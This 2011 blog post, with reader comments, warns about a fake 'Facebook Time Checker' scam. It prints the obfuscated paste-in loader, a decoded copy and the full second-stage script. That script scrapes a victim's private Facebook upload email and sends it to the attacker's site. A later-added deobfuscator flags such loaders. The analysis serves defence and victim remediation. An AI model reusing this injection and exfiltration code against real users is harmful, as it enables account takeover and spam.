Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker !
Posted by Dan | Filed under Down to Earth News, Material Things, products, services, maintenance
HERE IS HOW MY FACEBOOK PERSONAL PUBLISHING ADDRESS GOT STOLEN:
Update 2011.01.25 – For a complete German-language translation you can visit Elias’s blog.
( Using its personal publishing address, a Facebook user can post pictures and messages by sending an email directly to that address. If someone knows your personal publishing address they can impersonate you and post messages and pictures without your consent, or without you even knowing. This can easily be used by ill-intentioned persons to spam Facebook beyond usability. )
I recently ( 2011.01.18 – around 00:00 GMT ) clicked a link sent by a friend of mine on Facebook and … I eventually did what it told me to do. I was a little bit tired and not very attentive to the job at hand.
The link looked like: ” I’ve spent over 132 hours on facebook in my lifetime! Wow that’s a lot of time wasted! Find out how much time you’ve spent on facebook here – http://g_o_o.gl/AYkjm” ( the “_” in the website names is intentionally added by me here and in the following links to prevent unintentional clicking ). This shortened address “http://goo.gl/A_Y_k_j_m” forwarded me to “http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/next.php?id=SCiGm_d“. The page I arrived at was called “Facebook Time Checker“. It pretended that, by doing some “browser magic”, I would get as a result the amount of time I have spent on Facebook!
IT IS NOT TRUE! ONLY FACEBOOK KNOWS THIS, AND IT IS NOT PUBLIC!
IT’S JUST A GOOD PRETEXT FOR A THIRD PARTY TO STEAL YOUR PRIVATE INFORMATION!
They advised me to copy and paste this JavaScript into my browser’s address bar to check the time I had spent on Facebook so far.
Here is the JavaScript ( DON’T EVEN THINK OF COPY-PASTING THIS INTO YOUR BROWSER ):
javascript:var _0xbdfc=[
"\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x73\x72\x63",
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6e\x65\x77\x73\x31\x37\x63\x68\x61\x6e\x6e\x65\x6c\x2e\x63\x6f\x6d\x2f\x74\x69\x6d\x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",
"\x62\x6F\x64\x79"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);
I did as they said, mostly because I was doing things mechanically at that time…
Then I realised that maybe I had done something bad, so I started checking what the script was doing.
First I translated the script into a human-readable form (each “\xNN” is just the hex code of one character, and each _0xbdfc[n] is a lookup into that string array):
javascript:var _0xbdfc=[
"script",
"createElement",
"src",
"http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/mobile.js",
"appendChild",
"body"
];
var script=document[_0xbdfc[1]](_0xbdfc[0]);
script[_0xbdfc[2]]=_0xbdfc[3];
document[_0xbdfc[5]][_0xbdfc[4]](script);
void(0);
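To automate the translation step above, here is a small deobfuscator (an added example, not code from the original post or from the scammers’ script) that decodes the hex-escaped string array, resolves the _0xbdfc[n] lookups and, in the spirit of the automatic filtering suggested in the updates below, flags the “create a script element, point it at a remote .js, append it” shape that a post filter could look for. The sample payload is constructed in the same shape as the one above, with the real domain replaced by the placeholder example.invalid.

```javascript
// Added example, not from the original post: automates the manual "translation"
// above and flags the remote-script-loader shape. Domain below is a placeholder.
// Decode \xNN escapes inside a string-literal body back to plain text.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find `var _0xNAME=[ "...", ... ];` and return its decoded string table.
function parseStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([\s\S]*?)\];/i);
  if (!m) return null;
  const strings = [], lit = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  for (let q; (q = lit.exec(m[2])) !== null;) strings.push(decodeHexEscapes(q[1] ?? q[2]));
  return { name: m[1], strings };
}

// Drop the array declaration and replace each _0xNAME[i] with its literal,
// e.g. document[_0xbdfc[1]](_0xbdfc[0]) -> document["createElement"]("script").
function deobfuscate(src) {
  const t = parseStringArray(src);
  if (!t) return src;
  const body = src.replace(/var\s+_0x[0-9a-f]+\s*=\s*\[[\s\S]*?\];/i, '');
  return body.replace(new RegExp(t.name + '\\[(\\d+)\\]', 'g'),
    (_, i) => JSON.stringify(t.strings[Number(i)]));
}

// URL of the second-stage script, if the payload loads one (useful for blocklists).
function remoteScriptUrl(src) {
  const u = deobfuscate(src).match(/["'](https?:\/\/[^"']+\.js)["']/);
  return u ? u[1] : null;
}

// Heuristic a post filter could apply: a javascript: URL that creates a
// <script> element, points it at a remote .js file and appends it to the page.
function looksLikeRemoteLoader(src) {
  if (!/^\s*javascript:/i.test(src)) return false;
  const code = deobfuscate(src);
  return /createElement["']?\]?\s*\(\s*["']script["']/.test(code)
    && /appendChild/.test(code) && remoteScriptUrl(src) !== null;
}

// Constructed sample in the same shape as the payload above, with the real
// domain replaced by example.invalid; hexEscape exists only to build it.
const hexEscape = s => [...s].map(c => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE = 'javascript:var _0xbdfc=["' +
  ['script', 'createElement', 'src', 'http://example.invalid/time/mobile.js', 'appendChild', 'body']
    .map(hexEscape).join('","') + '"];var script=document[_0xbdfc[1]](_0xbdfc[0]);' +
  'script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);';
console.log(deobfuscate(SAMPLE));
console.log('remote loader:', looksLikeRemoteLoader(SAMPLE), remoteScriptUrl(SAMPLE));
```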
Obviously this injects a JavaScript file hosted on that remote server into the Facebook page you pasted it on, so it runs inside your logged-in session with all of your privileges.
Let’s check the mobile.js file:
//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
  //Grab post form id and other stuff for posting
  if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php") {
    alert("Wrong Page. You must paste the script into your browser's\n address bar on any facebook tab or window.\n\n Then Hit Enter!");
    return;
  }
  var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  //grab mobiles
  $.get("http://m.facebook.com/upload.php", function(data){
    var mydata = data;
    var mobiles;
    var count = 0;
    $($(mydata).find('a').filter(':contains("m.facebook.com")')).each(function(){
      if(($(this).text() != undefined)){ mobiles += $(this).text() +";";}
    });
    var clean = mobiles.replace("undefined","");
    var cut = clean.slice(0,clean.length - 1);
    var insert = cut.replace(/;/g,",");
    //Redirect to php inserter which redirects back to next set of steps.
    top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/check.php?get=1&m=,'+insert;
  });
},2000);
alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");
By looking at this file we can immediately see that the script fetches your Facebook Mobile upload.php page (using your own session cookies) and then harvests the text of every link on it that contains “m.facebook.com”.
That text contains your personal upload email address.
The last thing the script does is send this address back to the third-party website, as a parameter of the check.php redirect.
They now control your Facebook! Using this email they can post anything to your Facebook page without your permission!!
If by mistake you, like me, already did all the stuff you are not supposed to be doing … you need to:
!!! GO TO YOUR http://m.facebook.com/upload.php PAGE AND RESET YOUR PERSONAL PUBLISHING ADDRESS !!!
By resetting the address Facebook generates a new one for you! That is enough, because the attacker has no way to find out your new publishing address as long as you don’t run such a script again!
I really hope people read this in time not to “F”-word their Facebook! If you know other websites hosting this type of attack please let us know ( comments are welcome ). Below is a list of such websites ( “_” added to prevent the risk of an unintentional click ):
- http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
- http://2_2_0.1_1_2.3_6.1_7_8/
UPDATES
2011.01.23 – It seems German Facebook users are also being tricked into using this JavaScript, and probably many more users in other languages. If someone is able to translate this post into other languages, so that others can read it in their mother tongue, their help is welcome. Please let me know about such translations and provide the appropriate link. I hereby permit anyone to translate the content of this post as long as the translated version links to this page.
2011.01.24 – Serbian users are also being tricked into using a different form of the script. I have dedicated another post to that one. The principle is the same: one pastes a JavaScript snippet into the browser’s address bar, and that snippet in turn loads another, more potent script. Searching the internet for more references, I found that these scripts are not as new as I thought. The problem is that social websites are making them viral. I guess Facebook should implement some system to filter these scripts automatically: it could check its users’ posts for certain patterns and also check the links its users share for remnants of such scripts. As far as I know, their copyright policy lets them do whatever they want with user content… so this should be no problem whatsoever.
2011.01.25 – Elias made a complete German translation of my post here. Thanks!
Tags: Facebook, FAKE, fraud, javascript, protection, publishing email, third party, Time Checker
January 19th, 2011 at 5:35 am
Hi there,
I have done exactly the same thing as you… and fortunately you are the first one who dealt with the problem.
I also followed the steps you said, but my problem is that I can’t reset the publishing address to “zero”; Facebook just generates a new one. Do you have any solution for that?
Or is there a possibility where I could enter my new publishing address instead of resetting it?!
Thanks in advance!
January 21st, 2011 at 5:00 pm
Thank you very very much for this Dan!!
I also did this, and then I got these spam messages in my profile.
Now I did a reset of my mobile-phone upload address and I hope it will work 😉
So thank you, you are the best!
January 21st, 2011 at 5:55 pm
Today some friends posted this rubbish in german FB and I searched for
a) the problem
b) the solution
I found both! :))
The mobile.js changed its location to China: http://2_2_0.1_1_2.3_6.1_7_8/ and we have German js-messages, too.
The “social gift” (in german: “social poison” 😉 lasts.
Many thanks!
January 22nd, 2011 at 10:48 am
HN,
as long as you have generated a new Facebook publishing email address the problem is solved! I think you cannot disable this option yet, but the attacker has no way of knowing your new address as long as you don’t use their script!
Regards,
Dan
January 23rd, 2011 at 7:30 am
http://2_2_0.1_1_2.3_6.1_7_8/~biznews2/time/next.php?id=gTttGd
but luckily i googled the script before i copy&pasted it 😉
January 23rd, 2011 at 3:04 pm
Thank you very much!
January 23rd, 2011 at 3:09 pm
Thank you very much for this!!
But I have a question. I pasted the script into the default Facebook home (www.facebook.com) and not into the m.facebook.com one.
Does it save me from the scam?
January 23rd, 2011 at 4:07 pm
[…] Facebook app that supposedly determines how much time one has spent on Facebook is nasty malware. Anyone who has fiddled this garbage into their account has given a few spammers, or something even worse, […]
January 23rd, 2011 at 4:54 pm
[…] This post was mentioned on Twitter by Niels Heidenreich and Elias Schwerdtfeger, Michael Witkowski. Michael Witkowski said: Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! http://j.mp/hasSJg via @AddToAny […]
January 23rd, 2011 at 5:21 pm
[…] That is how you catch the oh-so-funny posting with the blue Facebook clock and the text “I’ve spent over 27 hours on facebook in my lifetime! Wow that’s a lot of time wasted!…” – and this is how you get rid of the posting and prevent spam from being posted again via the Facebook Mobile publishing address. […]
January 23rd, 2011 at 11:45 pm
No! As long as you are logged in to Facebook using that browser the scam works 🙁
The script loads the mobile version without you even knowing it!
Dan
January 24th, 2011 at 8:46 am
[…] the following text is a quick rendering of an English-language text on the blog “Useful for me”. Publishing a translation is expressly permitted there, and because this […]
January 24th, 2011 at 8:52 am
I made a complete translation of your post into German, together with some annotations for the less technically literate.
Thanks for your great post!
January 26th, 2011 at 9:03 am
If I reset the personal publishing address, do I have to do anything on an Android phone that has my FB app on it, too?
January 27th, 2011 at 6:15 am
Thanks for the help man!!
January 27th, 2011 at 9:30 pm
If you have used by mistake exactly this script then just resetting your personal publishing address is enough.
Your Android/iPhone app is not affected by this in any way.
January 29th, 2011 at 2:33 am
Hello,
Ahem, thank you. Really useful
February 14th, 2011 at 3:07 am
[…] the necessary data and I set out to look for a solution on Google. The blog Useful for me came to the rescue; it described a similar way of stealing information from Facebook. Becoming a fan of the application and […]
February 15th, 2011 at 10:15 am
Hey,
thanks a lot for your solution, it already worked out for my personal page.
But what about fan pages I’m admin of? I’ve got a fan page with 4 different persons as admins. Unfortunately I was the only one that clicked on that shit. Anyway..
I already cut myself off as admin, but the script is still posting to my fan page.
So is there another mobile address for fan pages?
Maybe you’ve got any ideas.
thanks a lot!
February 15th, 2011 at 8:51 pm
Thank you very much! I have been looking for a solution for a long time.
Regards Simon
February 20th, 2011 at 4:23 am
Great article.. I want to know: can I decode JavaScript obfuscated code???
February 22nd, 2011 at 8:43 am
Can you give me a more specific example of code? I am not very familiar with JavaScript obfuscation but, because Java is a high-level language that will compile in a high-level form, it should not be so hard to reverse the parts of the code you need.
April 11th, 2011 at 2:55 pm
I have the same problem:
One of my friends tagged me in this post “wtf guys, you appeared as the people who stalked me the most, you can see yours at http://zxc.fbglitch-b.info/?p3j9xhk”, I went there and I did things, and now my account automatically sends spam and messages to my friends!!!
April 11th, 2011 at 3:17 pm
Thank you Dan, I will translate this post to Persian 🙂
September 19th, 2011 at 5:04 am
Hi there, very cool web site!! Man .. Beautiful .. Superb .. I will bookmark your blog and take the feeds also? I am happy to search out so many useful information right here in the post, we want work out extra techniques in this regard, thank you for sharing. . . . . .
November 21st, 2011 at 2:50 pm
Remarkable issues here. I’m very glad to peer your article. Thanks so much and I am taking a look forward to contact you. Will you please drop me a mail?
January 14th, 2012 at 10:29 am
I cannot see where you can reset your personal publishing address. Have they removed this ability?